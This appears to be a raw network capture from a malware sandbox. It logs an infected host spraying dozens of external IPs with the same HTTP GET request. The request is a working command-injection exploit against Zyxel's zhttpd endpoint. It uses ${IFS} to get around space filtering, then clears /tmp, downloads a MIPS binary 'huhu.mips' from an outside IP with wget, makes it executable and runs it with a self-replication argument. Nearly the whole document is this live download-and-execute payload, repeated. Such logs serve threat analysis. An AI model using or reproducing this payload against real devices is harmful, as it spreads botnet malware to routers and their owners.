                                      Jan 19, 2024 17:29:31.751216888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4174192.168.2.1445686189.199.97.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751250982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4175192.168.2.1444028162.54.246.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751293898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4176192.168.2.1446866143.15.73.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751343966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4177192.168.2.145735678.119.116.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751365900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4178192.168.2.1434190217.138.180.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751410007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4179192.168.2.145365266.54.84.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751442909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4180192.168.2.1457912166.207.145.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751499891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4181192.168.2.144993057.124.154.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751528025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4182192.168.2.145083054.19.172.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751584053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4183192.168.2.144780466.244.156.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751612902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4184192.168.2.145556843.129.156.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751641035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4185192.168.2.1449514200.151.19.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751667976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4186192.168.2.145734817.156.55.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751727104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4187192.168.2.145819225.89.103.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751817942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4188192.168.2.1458590199.118.30.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751849890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4189192.168.2.1457668111.215.21.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751899958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4190192.168.2.1446146124.26.50.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751921892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4191192.168.2.145913252.158.169.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.751982927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4192192.168.2.1433538171.8.214.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752015114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4193192.168.2.145479450.101.169.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752049923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4194192.168.2.1459056193.230.186.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752069950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4195192.168.2.145471297.55.235.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752113104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4196192.168.2.144746681.156.147.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752177954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4197192.168.2.1437556102.89.3.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752197981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4198192.168.2.145119893.147.163.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752237082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4199192.168.2.144021669.152.168.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752293110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4200192.168.2.144489419.100.16.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752337933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4201192.168.2.1436802212.126.221.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752394915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4202192.168.2.145244468.138.133.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752394915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4203192.168.2.143730664.0.229.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752429008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4204192.168.2.1433152131.194.42.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752460003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4205192.168.2.1453420153.150.94.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752516031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4206192.168.2.144395897.36.107.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752542973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4207192.168.2.1447632165.179.179.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752585888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4208192.168.2.143460499.221.245.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752639055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4209192.168.2.145159249.155.208.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752680063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4210192.168.2.143596682.23.224.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752712011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4211192.168.2.145884047.239.116.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752760887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4212192.168.2.1451926124.176.82.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752830982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4213192.168.2.143603064.205.212.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752876043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4214192.168.2.1437182145.216.89.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752912045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4215192.168.2.1439382211.247.95.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752938032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4216192.168.2.144855877.161.172.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752964973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4217192.168.2.1433498144.19.143.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.752993107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4218192.168.2.1455226119.132.145.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753030062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4219192.168.2.145580440.51.141.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753038883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4220192.168.2.1456184155.200.253.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753073931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4221192.168.2.1447522210.215.193.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753118992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4222192.168.2.1452386155.130.8.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753154993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4223192.168.2.1444930122.50.35.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753227949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4224192.168.2.144489471.185.151.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753247976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4225192.168.2.1444644216.66.215.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753299952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4226192.168.2.1459886222.9.179.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753338099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4227192.168.2.146053284.197.215.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753382921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4228192.168.2.144502888.237.149.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753407955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4229192.168.2.145170424.13.91.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753447056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4230192.168.2.145908686.109.218.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753483057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4231192.168.2.143485236.104.199.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753520012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4232192.168.2.1453218187.223.74.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753571987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4233192.168.2.143510272.23.107.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753612995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4234192.168.2.144739663.112.84.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753644943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4235192.168.2.1454942157.32.177.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753706932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4236192.168.2.1456666114.96.237.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:31.753719091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4237192.168.2.1432794196.138.163.174443
                                      TimestampBytes transferredDirectionData
